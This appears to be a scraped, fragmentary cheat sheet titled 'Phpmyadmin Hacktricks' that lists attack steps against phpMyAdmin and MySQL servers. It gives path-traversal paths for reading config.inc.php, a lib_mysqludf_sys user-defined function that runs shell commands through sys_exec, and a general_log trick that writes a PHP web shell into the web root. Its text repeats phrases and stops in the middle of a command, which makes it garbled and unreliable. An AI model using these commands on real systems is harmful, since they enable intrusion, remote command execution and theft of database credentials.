Phpmyadmin Hacktricks May 2026
../../etc/phpmyadmin/config.inc.php ../../var/lib/phpmyadmin/config.inc.php .../config.inc.php Look for:
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('whoami > /tmp/test.txt'); Check your current privileges: phpmyadmin hacktricks
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT '<?php system($_GET["cmd"]); ?>'; SET GLOBAL general_log = 'OFF'; For MySQL versions < 5.1 or with plugin directory writable, compile a shared library and create a custom function to run commands. SELECT sys_exec('whoami >